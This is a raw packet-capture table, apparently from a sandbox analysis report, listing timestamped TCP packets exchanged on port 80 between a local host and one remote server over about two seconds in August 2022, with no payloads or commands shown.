Aug 23, 2022 03:42:47.685277939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685328960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685354948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685372114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685379982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685390949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685405970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685412884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685441971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685714960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685736895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685798883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685815096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.697346926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697416067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697453976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697489977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697504044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.697527885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697547913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.697567940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697576046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.697604895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697606087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.697643995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.697643995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697680950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697685003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.697710037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.697721958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.697743893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.698191881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.698234081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.698271036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.698270082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.698291063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.698307991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.698307991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.698338032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.698348045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.698383093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.971120119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.971292973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:48.495467901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:48.495635986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.007560015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.008064985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.042741060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.042807102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.042849064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.042857885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.042920113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.042926073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.043807030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.043869972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.043889999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.043922901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.043931961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.043973923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.043976068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.044013977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.044013977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.044054985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.044054985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.044094086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.044096947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.044135094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.077095985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077122927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077141047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077153921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077272892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.077281952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077312946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077331066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.077337980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.077354908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.077837944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077863932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077881098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077898979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077918053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077917099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.077945948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.077953100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077970982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.077981949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.077989101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.078007936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.078011036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.078033924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.078042030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.078058004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.078061104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.078078985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.078083992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.078099966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.078125954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.078126907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.078145027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.078166962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.078181982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.108288050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.108565092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111295938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111334085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111387968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111402988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111414909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111433029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111438036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111443043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111450911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111468077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111479998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111499071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111504078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111526012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111536026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111552954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111562967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111578941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111588955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111604929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111615896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111629009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111643076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111665964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111686945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111726046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111732960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111758947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111773014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111783981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111795902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111809015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111820936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111833096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111848116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111855030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111871958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111880064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111886024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111905098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111927986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111934900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111944914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111952066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.111967087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.111998081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112008095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112047911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112077951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112111092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112118006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112143040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112152100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112159967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112164974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112188101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112194061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112211943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112225056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112230062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112236023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112263918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112267971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112291098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112298012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112303972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112329006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112420082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112449884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112467051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112476110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112493992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112504005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112514973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112529993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112548113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112555027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112574100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112581015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.112598896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112612963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112776041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.112931013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145663023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145699978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145725965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145749092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145752907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145772934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145797968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145806074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145812988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145817995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145822048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145833015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145843983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145859003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145884037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145893097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145908117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145931959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145936012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145956039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145966053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.145981073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.145996094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146014929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146023035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146047115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146071911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146095037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146120071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146161079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146188021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146203995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146214008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146239042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146253109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146255016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146295071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146305084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146312952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146353006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146387100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146411896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146435022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146445036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146454096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146457911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146461010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146472931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146492958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146517038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146534920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146548986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146589041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146595001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146636963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146639109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146661997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146682024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146693945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146703959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146703005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146748066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146752119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146795988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146819115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146821022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146862984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146863937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146903038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146905899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146930933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.146955013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146966934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.146971941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147012949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147028923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147053003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147069931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147093058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147094965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147138119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147151947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147192001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147192955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147202969 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147218943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147233963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147258043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147259951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147303104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147381067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147427082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147459030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147516012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147559881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147634029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147674084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147679090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147699118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147717953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147741079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147741079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147783995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.147783995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147824049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.147964954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148020029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148073912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148138046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148183107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148253918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148281097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148304939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148308992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148323059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148344040 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148533106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148720980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148746014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148781061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148803949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148844004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148869991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148891926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148904085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.148930073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148953915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148976088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.148983002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149007082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149032116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149034023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149070978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149076939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149118900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149142981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149169922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149185896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149195910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149209023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149223089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149239063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149250984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149271011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149296045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149298906 CEST	80	49774	45.95.11.158	192.168.2.3
